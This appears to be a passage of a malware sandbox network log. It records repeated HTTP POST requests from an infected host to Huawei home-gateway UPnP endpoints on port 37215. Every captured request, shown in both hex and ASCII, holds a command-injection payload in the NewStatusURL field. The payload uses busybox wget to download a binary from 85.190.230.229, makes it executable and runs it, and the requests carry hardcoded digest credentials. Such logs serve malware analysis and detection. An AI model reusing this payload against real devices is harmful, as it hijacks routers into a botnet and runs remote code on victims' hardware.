2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458034992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425801992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361624956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232974052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999533892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      61192.168.2.1441832102.48.115.13637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.629412889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.970114946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482089996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474020004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458070040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425801039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 